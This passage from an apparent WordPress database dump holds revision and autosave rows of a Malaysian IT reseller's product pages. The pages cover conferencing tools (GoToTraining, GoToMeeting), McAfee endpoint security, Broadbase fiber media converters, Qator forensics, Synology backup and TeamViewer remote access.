Engagement</strong></li>\n</ul>\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\n</ul>\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\n\n&nbsp;\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\n</ul>\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\n</ul>\n<div class=\"icon-text__body\">Send emails after your class and reward your attendees when they finish.</div>\n<ul>\n 	<li><strong>Recording</strong></li>\n</ul>\nRecord your training and upload to the cloud for viewing on any device.\n\n&nbsp;\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\n&nbsp;\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\n&nbsp;','GoToTraining','','inherit','closed','closed','','1634-autosave-v1','','','2019-09-30 16:11:16','2019-09-30 08:11:16','',1634,'https://bintara.com.my/blog/2018/12/13/1634-autosave-v1/',0,'revision','',0),(2013,1,'2019-09-30 14:45:14','2019-09-30 06:45:14','<h2 class=\"section-header__headline\">Connect with anyone, anywhere. On any device.</h2>\n<h4 class=\"section-header__subheadline\">GoToMeeting makes it easy to connect with people any way you want.</h4>\n<ul>\n 	<li>\n<h4>Collaborate with business managing</h4>\n</li>\n</ul>\n<img class=\"alignnone wp-image-2014\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1.jpg\" alt=\"\" width=\"673\" height=\"356\" />\n\n&nbsp;\n<ul>\n 	<li>\n<h4>Less note-taking with Transcripts</h4>\n</li>\n</ul>\n<img class=\"alignnone wp-image-2015\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/2.png\" alt=\"\" width=\"667\" height=\"371\" />\n\n\n&nbsp;\n<ul>\n 	<li>\n<h4>Meet instantly or schedule one for later</h4>\n</li>\n</ul>\n<img class=\"alignnone wp-image-2016\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3.jpg\" alt=\"\" width=\"665\" height=\"351\" />\n<ul>\n 	<li>\n<h4>Customize team setting to your needs</h4>\n</li>\n</ul>\n<img class=\"alignnone wp-image-2017\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/4.jpg\" alt=\"\" width=\"652\" height=\"348\" />\n<ul>\n 	<li>\n<h4>Out of the box video conferencing</h4>\n</li>\n</ul>\n<img class=\"alignnone wp-image-2018\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/5.jpg\" alt=\"\" width=\"661\" height=\"327\" />\n\n&nbsp;\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','GoToMeeting','','inherit','closed','closed','','1632-autosave-v1','','','2019-09-30 14:45:14','2019-09-30 06:45:14','',1632,'https://bintara.com.my/blog/2018/12/12/1632-autosave-v1/',0,'revision','',0),(2241,1,'2018-12-17 10:18:39','2018-12-17 02:18:39','<h3>Enterprise security that works smarter, not harder.</h3>\r\n<h3>Simplify</h3>\r\nSimplify your back-office environment with unified workflows and common security management tools, allowing existing resources to work more efficiently.\r\n<h3>Accelerate</h3>\r\nRapidly deploy new enterprise security technologies to gain first-mover advantages of capabilities that have not yet caught the attention of cybercriminals.\r\n<h3>Orchestrate</h3>\r\nGain maximum efficacy through a business security platform approach that delivers integrated controls, automated workflows, and orchestrated systems.\r\n<h3></br></h3>\r\n<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n\r\n&nbsp;\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Endpoint</strong></li>\r\n</ul>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Mobile</strong></li>\r\n</ul>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Endpoint Security</strong></li>\r\n</ul>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION EDR</strong></li>\r\n</ul>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Embedded Control</strong></li>\r\n</ul>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','inherit','closed','closed','','1549-autosave-v1','','','2018-12-17 10:18:39','2018-12-17 02:18:39','',1549,'https://bintara.com.my/blog/2018/12/17/1549-autosave-v1/',0,'revision','',0),(2232,1,'2018-12-17 09:32:34','2018-12-17 01:32:34','','pdf-workflows','','inherit','closed','closed','','pdf-workflows','','','2018-12-17 09:32:34','2018-12-17 01:32:34','',1553,'https://bintara.com.my/wp-content/uploads/2018/12/pdf-workflows.png',0,'attachment','image/png',0),(2233,1,'2018-12-17 09:33:28','2018-12-17 01:33:28','','convert-files','','inherit','closed','closed','','convert-files','','','2018-12-17 09:33:28','2018-12-17 01:33:28','',1553,'https://bintara.com.my/wp-content/uploads/2018/12/convert-files.png',0,'attachment','image/png',0),(2234,1,'2018-12-17 09:34:22','2018-12-17 01:34:22','','connect-documents','','inherit','closed','closed','','connect-documents','','','2018-12-17 09:34:22','2018-12-17 01:34:22','',1553,'https://bintara.com.my/wp-content/uploads/2018/12/connect-documents.png',0,'attachment','image/png',0),(2235,1,'2018-12-17 09:35:24','2018-12-17 01:35:24','','maximize-time','','inherit','closed','closed','','maximize-time','','','2018-12-17 09:35:24','2018-12-17 01:35:24','',1553,'https://bintara.com.my/wp-content/uploads/2018/12/maximize-time.png',0,'attachment','image/png',0),(1951,1,'2018-12-12 16:32:28','2018-12-12 08:32:28','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"736\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-12 16:32:28','2018-12-12 08:32:28','',1943,'https://bintara.com.my/blog/2018/12/12/1943-revision-v1/',0,'revision','',0),(1954,1,'2018-12-12 16:39:15','2018-12-12 08:39:15','<h3>Qator Enterpriseâ„¢</h3>\r\n<h4><img class=\"alignnone wp-image-1948 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Qator_big.png\" alt=\"\" width=\"239\" height=\"300\" /></h4>\r\n<h4>Remote Forensic Analysis &amp; Security Incident Management Solution</h4>\r\n<ul>\r\n 	<li>Forensic investigation function</li>\r\n 	<li>Investigate confidential information breach</li>\r\n 	<li>Check important information distribution</li>\r\n 	<li>Collect various information from client</li>\r\n</ul>\r\n<h4>Summary</h4>\r\n<ul>\r\n 	<li>Qator Enterprise allows users to efficiently track down information and inspect systems in case of information breach.</li>\r\n 	<li>It allows users to prevent breaches by analyzing target PCs via remote inspection.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-1942\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator_summary_new.png\" alt=\"\" width=\"700\" height=\"167\" />\r\n<h4>Forensics</h4>\r\n<ul>\r\n 	<li>Search and analyze files</li>\r\n 	<li>Restore deleted data</li>\r\n 	<li>Time-series analysis</li>\r\n 	<li>Internet/email analysis</li>\r\n 	<li>Evidence imaging</li>\r\n 	<li>DRM document analysis</li>\r\n</ul>\r\n<h4>Data Collection</h4>\r\n<ul>\r\n 	<li>Periodic data collection</li>\r\n 	<li>Volatile data collection</li>\r\n 	<li>Remote inspection</li>\r\n 	<li>PC screen image collection</li>\r\n</ul>\r\n<h4>Remote Inspection</h4>\r\n<ul>\r\n 	<li>Inspect file use</li>\r\n 	<li>Inspect PC screen</li>\r\n 	<li>Set up security management policy</li>\r\n 	<li>Create report</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Qator Enterprise','','inherit','closed','closed','','1575-revision-v1','','','2018-12-12 16:39:15','2018-12-12 08:39:15','',1575,'https://bintara.com.my/blog/2018/12/12/1575-revision-v1/',0,'revision','',0),(2133,1,'2018-12-14 10:15:39','2018-12-14 02:15:39','<h3>Synology</h3>\r\n<h3>Tiered data protection for business continuity</h3>\r\nData is the lifeblood of business. When accidents or hardware failures result in data loss, productivity drops and your business suffers. Traditional backup strategies present challenges like long recovery times or extraneous storage consumption. Your business needs a smart backup strategy to effectively protect against all threats and keep operations running smoothly.\r\n<div class=\"container-960 center\">\r\n<h3>Accidents do happen</h3>\r\nThreats come in many shapes and sizes. A sound backup strategy requires contingency plans for a variety of incidents.\r\n\r\n</div>\r\n<div class=\"pure-g autopad-60-h\">\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_01.png\" srcset=\"img/solution/nas_protection/icon_01@2x.png 2x\" alt=\"\" />\r\n<h4>Deleted data</h4>\r\nEmployees delete important data intentionally or accidentally.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_02.png\" srcset=\"img/solution/nas_protection/icon_02@2x.png 2x\" alt=\"\" />\r\n<h4>Malicious attacks</h4>\r\nSystems succumb to hacking or ransomware.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_03.png\" srcset=\"img/solution/nas_protection/icon_03@2x.png 2x\" alt=\"\" />\r\n<h4>Hardware failure</h4>\r\nMultiple hard drives might crash at the same time resulting in data loss.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_04.png\" srcset=\"img/solution/nas_protection/icon_04@2x.png 2x\" alt=\"\" />\r\n<h4>Natural disaster</h4>\r\nData centers encounter fires, floods, or other disasters that cause downtime.\r\n\r\n</div>\r\n<h3>Private and public clouds, perfectly united</h3>\r\nSynology C2 Backup offers a highly-integrated and cost-effective cloud backup solution for Synology NAS. Keep backups offsite, go back in time with file versioning, and rest easy knowing data is encrypted â€” all without worrying about surprise fees.\r\n\r\n<img class=\"\" src=\"https://www.synology.com/img/solution/nas_protection/Private_and_public_clouds_ui.png\" srcset=\"img/solution/nas_protection/Private_and_public_clouds_ui@2x.png 2x\" alt=\"\" width=\"372\" height=\"222\" />\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Synology','','inherit','closed','closed','','1600-autosave-v1','','','2018-12-14 10:15:39','2018-12-14 02:15:39','',1600,'https://bintara.com.my/blog/2018/12/14/1600-autosave-v1/',0,'revision','',0),(1956,1,'2018-12-12 16:43:54','2018-12-12 08:43:54','<h3>Synology</h3>\r\n<h3>Tiered data protection for business continuity</h3>\r\nData is the lifeblood of business. When accidents or hardware failures result in data loss, productivity drops and your business suffers. Traditional backup strategies present challenges like long recovery times or extraneous storage consumption. Your business needs a smart backup strategy to effectively protect against all threats and keep operations running smoothly.\r\n<div class=\"container-960 center\">\r\n<h3>Accidents do happen</h3>\r\nThreats come in many shapes and sizes. A sound backup strategy requires contingency plans for a variety of incidents.\r\n\r\n</div>\r\n<div class=\"pure-g autopad-60-h\">\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\"><img src=\"https://www.synology.com/img/solution/nas_protection/icon_01.png\" srcset=\"img/solution/nas_protection/icon_01@2x.png 2x\" alt=\"\" />\r\n<h4>Deleted data</h4>\r\nEmployees delete important data intentionally or accidentally.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\"><img src=\"https://www.synology.com/img/solution/nas_protection/icon_02.png\" srcset=\"img/solution/nas_protection/icon_02@2x.png 2x\" alt=\"\" />\r\n<h4>Malicious attacks</h4>\r\nSystems succumb to hacking or ransomware.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\"><img src=\"https://www.synology.com/img/solution/nas_protection/icon_03.png\" srcset=\"img/solution/nas_protection/icon_03@2x.png 2x\" alt=\"\" />\r\n<h4>Hardware failure</h4>\r\nMultiple hard drives might crash at the same time resulting in data loss.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\"><img src=\"https://www.synology.com/img/solution/nas_protection/icon_04.png\" srcset=\"img/solution/nas_protection/icon_04@2x.png 2x\" alt=\"\" />\r\n<h4>Natural disaster</h4>\r\nData centers encounter fires, floods, or other disasters that cause downtime.\r\n\r\n</div>\r\n<h4>Private and public clouds, perfectly united</h4>\r\nSynology C2 Backup offers a highly-integrated and cost-effective cloud backup solution for Synology NAS. Keep backups offsite, go back in time with file versioning, and rest easy knowing data is encrypted â€” all without worrying about surprise fees.\r\n\r\n<img class=\"\" src=\"https://www.synology.com/img/solution/nas_protection/Private_and_public_clouds_ui.png\" srcset=\"img/solution/nas_protection/Private_and_public_clouds_ui@2x.png 2x\" alt=\"\" width=\"372\" height=\"222\" />\r\n\r\n</div>','Synology','','inherit','closed','closed','','1600-revision-v1','','','2018-12-12 16:43:54','2018-12-12 08:43:54','',1600,'https://bintara.com.my/blog/2018/12/12/1600-revision-v1/',0,'revision','',0),(1957,1,'2018-12-12 16:44:21','2018-12-12 08:44:21','<h3>Synology</h3>\r\n<h3>Tiered data protection for business continuity</h3>\r\nData is the lifeblood of business. When accidents or hardware failures result in data loss, productivity drops and your business suffers. Traditional backup strategies present challenges like long recovery times or extraneous storage consumption. Your business needs a smart backup strategy to effectively protect against all threats and keep operations running smoothly.\r\n<div class=\"container-960 center\">\r\n<h3>Accidents do happen</h3>\r\nThreats come in many shapes and sizes. A sound backup strategy requires contingency plans for a variety of incidents.\r\n\r\n</div>\r\n<div class=\"pure-g autopad-60-h\">\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_01.png\" srcset=\"img/solution/nas_protection/icon_01@2x.png 2x\" alt=\"\" />\r\n<h4>Deleted data</h4>\r\nEmployees delete important data intentionally or accidentally.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_02.png\" srcset=\"img/solution/nas_protection/icon_02@2x.png 2x\" alt=\"\" />\r\n<h4>Malicious attacks</h4>\r\nSystems succumb to hacking or ransomware.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_03.png\" srcset=\"img/solution/nas_protection/icon_03@2x.png 2x\" alt=\"\" />\r\n<h4>Hardware failure</h4>\r\nMultiple hard drives might crash at the same time resulting in data loss.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_04.png\" srcset=\"img/solution/nas_protection/icon_04@2x.png 2x\" alt=\"\" />\r\n<h4>Natural disaster</h4>\r\nData centers encounter fires, floods, or other disasters that cause downtime.\r\n\r\n</div>\r\n<h3>Private and public clouds, perfectly united</h3>\r\nSynology C2 Backup offers a highly-integrated and cost-effective cloud backup solution for Synology NAS. Keep backups offsite, go back in time with file versioning, and rest easy knowing data is encrypted â€” all without worrying about surprise fees.\r\n\r\n<img class=\"\" src=\"https://www.synology.com/img/solution/nas_protection/Private_and_public_clouds_ui.png\" srcset=\"img/solution/nas_protection/Private_and_public_clouds_ui@2x.png 2x\" alt=\"\" width=\"372\" height=\"222\" />\r\n\r\n</div>','Synology','','inherit','closed','closed','','1600-revision-v1','','','2018-12-12 16:44:21','2018-12-12 08:44:21','',1600,'https://bintara.com.my/blog/2018/12/12/1600-revision-v1/',0,'revision','',0),(1958,1,'2018-12-12 16:45:22','2018-12-12 08:45:22','<h3>Synology</h3>\r\n<h3>Tiered data protection for business continuity</h3>\r\nData is the lifeblood of business. When accidents or hardware failures result in data loss, productivity drops and your business suffers. Traditional backup strategies present challenges like long recovery times or extraneous storage consumption. Your business needs a smart backup strategy to effectively protect against all threats and keep operations running smoothly.\r\n<div class=\"container-960 center\">\r\n<h3>Accidents do happen</h3>\r\nThreats come in many shapes and sizes. A sound backup strategy requires contingency plans for a variety of incidents.\r\n\r\n</div>\r\n<div class=\"pure-g autopad-60-h\">\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_01.png\" srcset=\"img/solution/nas_protection/icon_01@2x.png 2x\" alt=\"\" />\r\n<h4>Deleted data</h4>\r\nEmployees delete important data intentionally or accidentally.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_02.png\" srcset=\"img/solution/nas_protection/icon_02@2x.png 2x\" alt=\"\" />\r\n<h4>Malicious attacks</h4>\r\nSystems succumb to hacking or ransomware.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_03.png\" srcset=\"img/solution/nas_protection/icon_03@2x.png 2x\" alt=\"\" />\r\n<h4>Hardware failure</h4>\r\nMultiple hard drives might crash at the same time resulting in data loss.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_04.png\" srcset=\"img/solution/nas_protection/icon_04@2x.png 2x\" alt=\"\" />\r\n<h4>Natural disaster</h4>\r\nData centers encounter fires, floods, or other disasters that cause downtime.\r\n\r\n</div>\r\n<h3>Private and public clouds, perfectly united</h3>\r\nSynology C2 Backup offers a highly-integrated and cost-effective cloud backup solution for Synology NAS. Keep backups offsite, go back in time with file versioning, and rest easy knowing data is encrypted â€” all without worrying about surprise fees.\r\n\r\n<img class=\"\" src=\"https://www.synology.com/img/solution/nas_protection/Private_and_public_clouds_ui.png\" srcset=\"img/solution/nas_protection/Private_and_public_clouds_ui@2x.png 2x\" alt=\"\" width=\"372\" height=\"222\" />\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Synology','','inherit','closed','closed','','1600-revision-v1','','','2018-12-12 16:45:22','2018-12-12 08:45:22','',1600,'https://bintara.com.my/blog/2018/12/12/1600-revision-v1/',0,'revision','',0),(1959,1,'2018-12-14 10:23:10','2018-12-14 02:23:10','<strong>TeamViewer</strong>Â focuses on cloud-based technologies to enable online remote support and collaboration globally. To thrive now and in the coming years, businesses and individuals need remote desktop support, remote access, and online collaboration to be able to connect worldwide. TeamViewer is at the forefront of that innovation.\r\n\r\n<img class=\"wp-image-1960 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png\" alt=\"\" width=\"509\" height=\"257\" />\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\nWeâ€™re serious about security, and we put our customers and their clients first when it comes to protecting them with the latest in technology. Our infrastructure is ISO 27001 certified and completely HIPAA and SOC2 compliant:\r\n<ul>\r\n 	<li>256-bit AES Encryption</li>\r\n 	<li>Two-Factor Authentication</li>\r\n 	<li>SOC2 Certified and Compliant</li>\r\n 	<li>ISO 27001 Certification for Information Security Management</li>\r\n 	<li>HIPAA Compliant</li>\r\n 	<li>Brute Force Protection</li>\r\n 	<li>User &amp; IP Whitelisting</li>\r\n 	<li>Trusted Device Lists</li>\r\n 	<li>Enforced Password Reset</li>\r\n</ul>\r\n<div class=\"vc_row wpb_row vc_row-fluid wd-row wd-row--tertiary\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-md-8 vc_col-xs-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\">\r\n<h3>Connect to Your Desktop Remotely. Without Slow VPN or Network Security Restrictions Getting in Your Way.</h3>\r\n</div>\r\nSupported by a blazing-fast global network, TeamViewerâ„¢ free remote access softwareÂ tools enable you connect to your work computer, from anywhere, anytime. So you can continue working with desktop applications remotely. And access desktop files, as if you were sitting in front of your workstation. Quickly. Easily. Securely.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"overview\" class=\"vc_row wpb_row vc_row-fluid wd-row\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div id=\"overview\" class=\"wpb_column vc_column_container vc_col-sm-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','TeamViewer','','inherit','closed','closed','','1605-autosave-v1','','','2018-12-14 10:23:10','2018-12-14 02:23:10','',1605,'https://bintara.com.my/blog/2018/12/12/1605-autosave-v1/',0,'revision','',0),(1960,1,'2018-12-12 16:50:33','2018-12-12 08:50:33','','Teamviewer page','','inherit','closed','closed','','teamviewer-page','','','2018-12-12 16:50:33','2018-12-12 08:50:33','',1605,'https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png',0,'attachment','image/png',0),(1961,1,'2018-12-12 16:55:23','2018-12-12 08:55:23','TeamViewerÂ focuses on cloud-based technologies to enable online remote support and collaboration globally. To thrive now and in the coming years, businesses and individuals need remote desktop support, remote access, and online collaboration to be able to connect worldwide. TeamViewer is at the forefront of that innovation.\r\n\r\n<img class=\"wp-image-1960 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png\" alt=\"\" width=\"509\" height=\"257\" />\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\nWeâ€™re serious about security, and we put our customers and their clients first when it comes to protecting them with the latest in technology. Our infrastructure is ISO 27001 certified and completely HIPAA and SOC2 compliant:\r\n<ul>\r\n 	<li>256-bit AES Encryption</li>\r\n 	<li>Two-Factor Authentication</li>\r\n 	<li>SOC2 Certified and Compliant</li>\r\n 	<li>ISO 27001 Certification for Information Security Management</li>\r\n 	<li>HIPAA Compliant</li>\r\n 	<li>Brute Force Protection</li>\r\n 	<li>User &amp; IP Whitelisting</li>\r\n 	<li>Trusted Device Lists</li>\r\n 	<li>Enforced Password 